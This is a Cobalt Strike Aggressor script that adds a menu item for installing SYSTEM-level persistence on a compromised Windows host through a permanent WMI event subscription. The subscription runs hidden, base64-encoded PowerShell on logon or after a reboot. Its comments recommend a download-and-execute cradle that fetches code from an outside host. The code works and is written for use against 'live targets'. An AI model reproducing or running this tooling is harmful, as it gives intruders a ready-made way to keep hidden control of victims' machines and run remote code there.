60 lines
3.5 KiB
Plaintext
60 lines
3.5 KiB
Plaintext
#Permanent WMI Event using PowerShell Persistence
|
|
#Author: @r3dQu1nn
|
|
#Generates a Custom WMI Event using Powershell for SYSTEM Level persistence on selected beacon
|
|
#Very syntax heavy, Test first before using on live targets
|
|
#Sample Queries:
|
|
## User Logon:
|
|
#SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2
|
|
## System UpTime (Reboot):
|
|
#SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320
|
|
#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
|
|
##Recommended Encoded Payload:
|
|
#base 64 encode IEX of the powershell one liner ex: IEX (new-object net.webclient).downloadstring('http://10.1.1.1/a') > payload.txt
|
|
#cat payload.txt | iconv --to-code=UTF-16LE | base64 -w 0
|
|
|
|
sub persistwmievent {
|
|
$bid = $1;
|
|
if (-is64 $bid) {
|
|
$ExePath = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc";
|
|
}
|
|
else {
|
|
$ExePath = "C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc";
|
|
}
|
|
|
|
$dialog = dialog("Permanent WMI Event Persistence with PowerShell", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", payloadstring => "Encoded Payload String.."), lambda({
|
|
if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['payloadstring']" ismatch 'Encoded Payload String..') {
|
|
berror($bid, "\c4Please enter a valid __EventFilter Name, Event Query, and an Encoded Payload String.");
|
|
break;
|
|
}
|
|
else {
|
|
$powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name=\"".$3['eventfilter']."\";EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"".$3['eventquery']."\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name=\"".$3['eventfilter']."\";CommandLineTemplate =\"". $ExePath ." ".$3['payloadstring']."\"};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
|
|
bpowerpick!($bid, $powershellcmd);
|
|
blog($bid, 'Permanently Storing '.$3['eventfilter'].' in root\CimV2..');
|
|
bpowerpick($bid, 'Get-WmiObject __eventFilter -namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
|
|
bpowerpick($bid, 'Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
|
|
}
|
|
}));
|
|
dialog_description($dialog, "Generates a Custom WMI Event using PowerShell for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload String must be converted to UTF-16LE, base64 encoded and under 1MB.**");
|
|
|
|
drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
|
|
drow_text($dialog, "eventquery", "Custom Event Query:");
|
|
drow_text($dialog, "payloadstring", "Custom Encoded Payload String:");
|
|
|
|
dbutton_action($dialog, "Create");
|
|
dialog_show($dialog);
|
|
}
|
|
|
|
popup beacon_bottom {
|
|
item "&Permanent WMI Event Persistence with PowerShell" {
|
|
local('$bid');
|
|
foreach $bid ($1) {
|
|
if (-isadmin $bid) {
|
|
persistwmievent($bid);
|
|
}
|
|
else {
|
|
berror($1, "\c4Persistence Requires Admin Level Privileges");
|
|
}
|
|
}
|
|
}
|
|
}
|